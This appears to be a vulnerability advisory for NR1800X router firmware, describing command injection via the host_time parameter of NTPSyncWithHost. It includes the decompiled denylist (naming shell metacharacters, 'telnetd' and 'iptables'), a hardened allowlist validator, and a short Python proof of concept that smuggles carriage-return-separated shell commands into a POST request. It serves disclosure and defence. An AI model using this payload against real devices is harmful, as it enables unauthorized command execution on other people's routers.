Overview

Affected version

NR1800X_Firmware V9.1.0u.6279_B20210910

Vulnerability details

NR1800X_Firmware V9.1.0u.6279_B20210910 has a command injection vulnerability in the NTPSyncWithHost function. The Var variable receives the host_time parameter from a POST request. Because the user controls the value of host_time, command injection is possible through the telnet service.


#include <string.h>
#include <stdbool.h>

/* Decompiled denylist check applied to the input: returns nonzero when the
 * string contains a character or substring the firmware considers dangerous.
 * The decompiler showed the characters as numeric codes; they are given as
 * character literals here with the original code in the comment. */
bool Validity_check(const char *a1)
{
  return strchr(a1, ';')          /* 59  */
      || strstr(a1, ".sh")
      || strstr(a1, "iptables")
      || strstr(a1, "telnetd")
      || strchr(a1, '&')          /* 38  */
      || strchr(a1, '|')          /* 124 */
      || strchr(a1, '`')          /* 96  */
      || strchr(a1, '$')          /* 36  */
      || strchr(a1, '\n') != 0;   /* 10  */
}
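The check above is a denylist: it enumerates a handful of shell metacharacters and substrings and lets everything else through, which is why a control character it does not list still reaches the command. The following added example (not firmware code; the function names and the assumed timestamp shape "YYYY-MM-DD hh:mm:ss" are ours) puts a reconstruction of that denylist next to an allowlist validator that only accepts a fixed-shape timestamp, so that a value which passes it can be handed to date(1) via execve() without a shell.

```c
#include <stdbool.h>
#include <string.h>
#include <ctype.h>

/* Reconstruction of the firmware's denylist for comparison (our naming). */
static bool denylist_rejects(const char *s)
{
    return strchr(s, ';') || strstr(s, ".sh") || strstr(s, "iptables")
        || strstr(s, "telnetd") || strchr(s, '&') || strchr(s, '|')
        || strchr(s, '`') || strchr(s, '$') || strchr(s, '\n');
}

/* Hardened check (our example): accept only "dddd-dd-dd dd:dd:dd", where
 * each 'd' must be an ASCII digit; any other byte, including control
 * characters, makes the whole value invalid. Assumes host_time is meant
 * to carry a timestamp of this shape. */
static bool host_time_is_valid(const char *s)
{
    static const char shape[] = "dddd-dd-dd dd:dd:dd";
    size_t n = strlen(shape);

    if (strlen(s) != n)
        return false;
    for (size_t i = 0; i < n; i++) {
        if (shape[i] == 'd') {
            if (!isdigit((unsigned char)s[i]))
                return false;
        } else if (s[i] != shape[i]) {
            return false;
        }
    }
    return true;
}
```

A carriage return (0x0d, as used in the POC below) is not in the denylist, so denylist_rejects() passes it, while host_time_is_valid() rejects it because it is not a digit or separator at any position.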

POC

import requests
url = "http://192.168.153.2/cgi-bin/cstecgi.cgi"
cookie = {"Cookie":"SESSION_ID=2:1773363743:2"}

payload = 'a'*0x1000
data = {"host_time":"2024'\\x0decho hacker>/www/123.txt\\x0d'","topicurl":"NTPSyncWithHost"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
